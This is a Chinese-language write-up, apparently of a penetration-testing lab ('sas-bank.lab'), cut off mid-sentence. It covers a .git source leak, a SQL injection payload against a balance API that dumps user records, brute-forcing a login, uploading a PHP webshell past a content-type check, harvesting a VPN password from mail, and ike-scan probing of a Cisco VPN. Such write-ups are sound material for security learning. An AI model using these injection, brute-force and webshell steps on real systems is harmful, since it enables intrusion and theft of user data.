首先对该站点进行端口扫描,发现打开的端口
然后用目录扫描器分别对HTTP和HTTPS进行扫描,得到以下扫描结果
在HTTP站点存在.git源码泄漏,利用网上的一个工具rip-git,可以把源码down下来,然后在源码里面可以找到HTTP站点的后台登录用户和密码,登录后可以找到SITE的TOKEN
CABINETCABINET对应的是HTTPS的站点,通过之前的扫描结果,存在一个API
You can use only '/api/auth' or '/api/balance' requests在auth接口随便输入一些字符 https://192.168.101.6/api/auth/?email=aaa@bank.com&password=passw0d
得到的结果 {"error":{"email":["The selected email is invalid."]}}如果加个单引号会怎样?结果得到ACCESS DENIED,试下balance
https://192.168.101.6/api/balance/?api_session_token=1&id=-1得到 {"error":{"api_session_token":["The api session token must be 40 characters."]}}
接着测试 https://192.168.101.6/api/balance/?api_session_token=1111111111111111111111111111111111111111&id=-1
但是返回结果为空,那么继续试试注入。 https://192.168.101.6/api/balance?api_session_token=111111111111111111111111111111'OR '1'='1&id=-1
这里有个问题,如果 /api/balance/?api_session_token=xxx 这样注入,就会出现ACCESS DENIED
最后得到结果
[{"id":"1","email":"KyleEShannon@cuvox.de","balance":"37.00"},{"id":"2","email":"EricLWhitaker@dayrep.com","balance":"59.00"},{"id":"3","email":"PhillipSPhillips@fleckens.hu","balance":"8.00"},{"id":"4","email":"DrewLHolloway@rhyta.com","balance":"111.00"},{"id":"5","email":"ErnestCWilliams@cuvox.de","balance":"154.00"},{"id":"6","email":"RobertPNetherton@cuvox.de","balance":"81.00"},{"id":"7","email":"IsmaelNNewcomb@dayrep.com","balance":"92.00"},{"id":"8","email":"AldenTPfaff@teleworm.us","balance":"78.00"},{"id":"9","email":"JamesMPang@fleckens.hu","balance":"42.00"},{"id":"10","email":"WilliamLSchmidt@armyspy.com","balance":"137.00"},{"id":"11","email":"JohnCPerkins@teleworm.us","balance":"126.00"},{"id":"12","email":"DonaldDRandolph@fleckens.hu","balance":"186.00"},{"id":"13","email":"JohnMMartin@rhyta.com","balance":"186.00"},{"id":"14","email":"MichaelJDavis@fleckens.hu","balance":"73.00"},{"id":"15","email":"TravisMHeadrick@cuvox.de","balance":"179.00"},{"id":"16","email":"JonathanJAlejandro@rhyta.com","balance":"67.00"},{"id":"17","email":"JeremiahBMagee@superrito.com","balance":"73.00"},{"id":"18","email":"ManuelTBoland@rhyta.com","balance":"35.00"},{"id":"19","email":"EthelCMyers@einrot.com","balance":"165.00"},{"id":"20","email":"RandyRDarden@superrito.comThomasMReid@rhyta.com","balance":"20.00"},{"id":"21","email":"JohnIHampton@teleworm.us","balance":"105.00"},{"id":"22","email":"LesterLLenard@cuvox.de","balance":"19.00"},{"id":"23","email":"RalphWestfall@sas-bank.lab","balance":"18.00"}]在得到邮箱地址后筛选出 RalphWestfall@sas-bank.lab ,因为sas-bank.lab符合域名信息,配合之前的auth api,可以进行暴力破解,密码用的是 https://github.com/danielmiessler/SecLists/blob/master/Passwords/10_million_password_list_top_10000.txt ,然后利用burpsuite来进行破解,得到密码后进行登录。
后台存在一个上传图片的功能,上传一个php文件,提示不能只能上传jpeg,BMP格式的图片,但是我们在uploads目录下还是可以找得到传的webshell,或者可以修改content-type来绕过。在webshell找找就可以找到token.txt了。
CISCO现在要拿到SSH-DEV的TOKEN,但是目前还没有任何关于SSH-DEV的信息,那么可以从192.168.101.7开始着手
第一步还是先扫描目标IP
Starting Nmap 6.40 ( http://nmap.org ) at 2016-03-12 13:48 CSTNmap scan report for 192.168.101.7
Host is up (0.77s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
| 2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
8100/tcp open http CommuniGate Pro httpd 6.0.9
| http-methods: Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: CommuniGate Pro sas-bank.lab Entrance
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: HP P2000 G3 NAS device (94%), linux 2.6.32 - 3.9 (92%), Linux 3.0 - 3.9 (92%), Linux 3.6 (90%), Crestron XPanel control system (90%), Netgear DG834G WAP or Western Digital WD TV media player (90%), Linux 2.6.32 - 2.6.39 (89%), Linux 2.6.38 (89%), Linux 3.2 (89%), Linux 3.1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 773.70 ms 10.10.0.1
2 773.75 ms 172-0-0-1.lightspeed.brhmal.sbcglobal.net (172.0.0.1)
3 773.78 ms 192.168.101.7
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.57 seconds
8100端口上存在着一个邮箱管理程序,用之前得到的邮箱密码尝试登录。
在里面可以找到一封VPN PASSWORD的邮件
Hi!We doing scheduled replacement of vpn passwords.
login: westfall
password: AiWa8ahk
All other parameters remain unchanged.
Have a nice day!
从网络拓扑图来看,应该可以确定是cisco的vpn,cisco vpn的连接方式除了需要用户名和密码,还需要组和组密码。比如:
IPSec gateway vpn17.example.comIPSec ID groupa
IPSec secret groupapassword
Xauth username charlie
Xauth password passw0rd
现在需要的就是猜解IPsec ID和IPSec secret,可以先用 ike-scan 来收集信息, 用户手册 。PS:之前做的时候完全是猜的ID和secret,看了writeup才知道有ikeforce;)
~csw ike-scan -A -M --id=bar 192.168.101.7Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
192.168.101.7 Aggressive Mode Handshake returned
HDR=(CKY-R=f59caea8c98e8852)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(20 bytes)
ID(Type=ID_IPV4_ADDR, Value=172.16.0.100)
Hash(20 bytes)
VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)
Ending ike-scan 1.9: 1 hosts scanned in 0.550 seconds (1.82 hosts/sec). 1 returned handshake; 0 returned notify
利用ikefor